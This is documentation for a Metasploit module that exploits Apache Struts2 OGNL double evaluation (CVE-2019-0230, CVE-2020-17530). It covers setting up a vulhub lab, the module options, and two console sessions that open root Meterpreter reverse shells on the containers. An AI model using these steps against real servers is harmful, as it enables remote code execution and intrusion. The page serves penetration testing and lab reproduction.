adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
ef4e7b2165ec317aceca4e58f2a2dee87f9918a5
metasploit-gs/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md
T

6.8 KiB
Raw Blame History

Vulnerable Application

The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).

This vulnerability is application dependant. A server side template must make an affected use of request data to render an HTML tag attribute.

Vulnerable versions of Apache Struts for both CVEs are provided by vulhub on GitHub. The setup instructions are identical for both CVEs, just use the provided files in the correct directory.

  1. Use git to clone https://github.com/vulhub/vulhub.git.
  2. Change the current working directory to the one corresponding to the CVE that should be tested. For CVE-2019-0230, use struts2/s2-059 and for CVE-2020-17530, use struts2/s2-061.
  3. From within the directory, run docker-compose up -d
  4. (OPTIONAL) Run docker-compose exec struts2 bash to obtain an interactive shell within the container. This is useful for debugging purposes.
  • CVE-2019-0230 was patched in 2.5.20
  • CVE-2020-17530 was patched in 2.5.26

Example Setting Up CVE-2020-17530 / S2-061

[smcintyre@localhost ~]$ git clone https://github.com/vulhub/vulhub.git
Cloning into 'vulhub'...
remote: Enumerating objects: 234, done.
remote: Counting objects: 100% (234/234), done.
remote: Compressing objects: 100% (141/141), done.
remote: Total 10171 (delta 86), reused 191 (delta 69), pack-reused 9937
Receiving objects: 100% (10171/10171), 130.98 MiB | 8.36 MiB/s, done.
Resolving deltas: 100% (4014/4014), done.
[smcintyre@localhost ~]$ cd vulhub/struts2/s2-061
[smcintyre@localhost s2-061]$ docker-compose up -d
Creating network "s2-061_default" with the default driver
Pulling struts2 (vulhub/struts2:2.5.25)...
2.5.25: Pulling from vulhub/struts2
756975cb9c7e: Pull complete
d77915b4e630: Pull complete
5f37a0a41b6b: Pull complete
96b2c1e36db5: Pull complete
27a2d52b526e: Pull complete
93a36defce60: Pull complete
9e2014d79b30: Pull complete
ac71d4ce2ce4: Pull complete
a2f817e4badf: Pull complete
62ac51b7362f: Pull complete
e12f6705ebbe: Pull complete
4f4fb700ef54: Pull complete
97ba98138d72: Pull complete
Digest: sha256:eaf49b95f2c178cca77d3c8454f79a4fe4ed4dd9d342c9e9a911e842565217d2
Status: Downloaded newer image for vulhub/struts2:2.5.25
Creating s2-061_struts2_1 ... done
[smcintyre@localhost s2-061]$ docker-compose exec struts2 bash
root@d37b5ab61b87:/usr/src#

Verification Steps

  1. Install the vulnerable application, see the "Vulnerable Application" section.
  2. Start msfconsole
  3. Do: use exploit/multi/http/struts2_multi_eval_ognl
  4. Set RHOSTS to the address of the target(s) to exploit.
  5. Set CVE to the ID of the CVE you wish to run against the target: either CVE-2020-17530 or CVE-2019-0230.
  6. Do: run

Options

NAME

The HTTP query parameter or form data name. This option is closely related to the vulnerability and will likely be application specific in real world environments. This must be the name of a parameter sent through either a GET or POST request to the application that is reflected back as an HTML attribute. The module's check method will utilize this value to determine if it can be used to evaluate OGNL expressions.

CVE

The CVE to try exploit on RHOSTS, either CVE-2020-17530 or CVE-2019-0230.

TARGETURI

The base path to a valid Struts application on the target machine or machines.

CMDSTAGER::DELAY

Delay between command executions. Set this value higher if the target tends to be slow to respond.

HttpCookie

An optional cookie to include when making the HTTP request.

Scenarios

CVE-2020-17530 From Vulhub

msf6 > use exploit/multi/http/struts2_multi_eval_ognl
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set TARGET Linux\ Dropper
TARGET => Linux Dropper
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/struts2_multi_eval_ognl) > check
[*] 192.168.159.128:8080 - The target appears to be vulnerable.
msf6 exploit(multi/http/struts2_multi_eval_ognl) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp using CVE-2020-17530
[*] Command Stager progress -  44.15% done (362/820 bytes)
[*] Sending stage (3008420 bytes) to 172.18.0.2
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.18.0.2:46770) at 2020-12-15 19:43:28 -0500
[*] Command Stager progress - 100.00% done (820/820 bytes)

meterpreter > getuid
Server username: root @ d37b5ab61b87 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 172.18.0.2
OS           : Debian 10.6 (Linux 5.9.11-100.fc32.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

CVE-2019-0230 From Vulhub

msf6 > use exploit/multi/http/struts2_multi_eval_ognl
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set CVE CVE-2019-0230
CVE => CVE-2019-0230
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set TARGET Linux\ Dropper
TARGET => Linux Dropper
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/struts2_multi_eval_ognl) > check
[*] 192.168.159.128:8080 - The target appears to be vulnerable.
msf6 exploit(multi/http/struts2_multi_eval_ognl) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp using CVE-2019-0230
[*] Command Stager progress -  44.15% done (362/820 bytes)
[*] Sending stage (3008420 bytes) to 172.19.0.2
[*] Command Stager progress - 100.00% done (820/820 bytes)
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.19.0.2:47884) at 2020-12-15 19:47:10 -0500

meterpreter > getuid
Server username: root @ 91f7855f1eda (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 172.19.0.2
OS           : Debian 10.5 (Linux 5.9.11-100.fc32.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink